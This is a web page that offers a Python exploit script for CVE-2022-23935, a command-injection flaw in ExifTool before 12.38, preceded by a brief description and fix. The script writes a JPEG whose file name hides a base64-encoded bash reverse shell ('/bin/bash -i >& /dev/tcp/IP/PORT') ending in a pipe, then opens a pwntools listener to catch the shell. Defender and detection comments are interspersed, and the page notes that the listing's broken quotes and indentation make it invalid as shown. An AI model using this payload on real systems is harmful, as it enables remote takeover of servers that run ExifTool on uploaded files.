CVE-2022-23935 Exploit

CVE-2022-23935 Exploit

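ExifTool prior to 12.38 mishandles a $file =~ /\|$/ check in lib/Image/ExifTool.pm, so a file name ending in a pipe character (|) is treated as a command to execute rather than as a file to open, which results in command injection. Upgrading to ExifTool 12.38 or later fixes the check; until then, do not pass file names from untrusted sources to ExifTool unchanged.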

#!/usr/bin/python3

from pwn import *
import base64
import sys

# Proof-of-concept helper for CVE-2022-23935 (ExifTool before 12.38): it writes a
# file whose NAME ends in "|" and then waits for a connection on a local port.
# NOTE(review): the listing lost its indentation and its quotes were turned into
# typographic characters when the page was rendered, so it is not valid Python as shown.
# Defender notes: upgrade ExifTool to 12.38 or later; store uploads under
# server-generated names before any metadata tool sees them; treat file names that
# end in "|" as suspicious; alert when an exiftool/perl process spawns a shell.
class ExploitExiftools:
# Keeps the address and port that generateExploit() embeds in the file name and
# that starting_listner() listens on; log.progress comes from the pwn star-import.
def __init__(self,ip,port):
self.ip = ip
self.port = port
self.p = log.progress(“”)

# Prints the ASCII-art banner below; it has no other effect.
def printBanner(self):
print(“””
_____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____
/ ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____|
| | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__
| | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \
| |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) | / / ___) | ___) |
\_____| \/ |______| |____| \___/|____||____| |____||____/ /_/ |____/ |____/

by 0xFTW
“””)

# Writes a small image file into the current working directory. The file body is
# harmless; the command is carried entirely by the file name.
def generateExploit(self):
self.p.status(“Generating payload ….”)
# Shell command that connects an interactive bash back to self.ip:self.port.
cmd = bytes(f’/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1′,’UTF-8′)
# The command is base64-encoded before it is embedded in the file name.
encodedName = base64.b64encode(cmd)
# Base64 of the bytes written as the file body; the leading "/9j/" decodes to the
# JPEG start-of-image marker, so this is presumably a minimal JPEG — confirm.
image = b”/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=”
# The name ends in "|", the case the vulnerable $file =~ /\|$/ check mishandles.
# Detection hint: a file name containing "base64 -d" and ending in "|" is a strong
# indicator of this technique in upload directories and process command lines.
imageName = f”echo {encodedName.decode()} | base64 -d | bash |”
with open(imageName, “wb”) as img:
img.write(base64.decodebytes(image))
self.p.status(f”Payload generated and saved as ‘{imageName}'”)

# Opens a pwntools listener on self.port, blocks until a peer connects, then hands
# the connection to an interactive session.
def starting_listner(self):
l = listen(self.port)
conn = l.wait_for_connection()
self.p.success(“Connected!!!!”)
conn.interactive()

# Script entry point: expects exactly two arguments, IP and PORT.
if __name__ == “__main__”:

# error() comes from the pwn star-import; presumably it aborts the script after
# printing the usage line — confirm against the installed pwntools version.
if len(sys.argv) != 3:
error(f”Usage: {sys.argv[0]} IP PORT”)

# Both arguments are passed through as strings, with no validation at this point.
if len(sys.argv) == 3:
exploit = ExploitExiftools(sys.argv[1],sys.argv[2])

# Banner, then file generation, then the blocking listener, in that order.
exploit.printBanner()
exploit.generateExploit()
exploit.starting_listner()
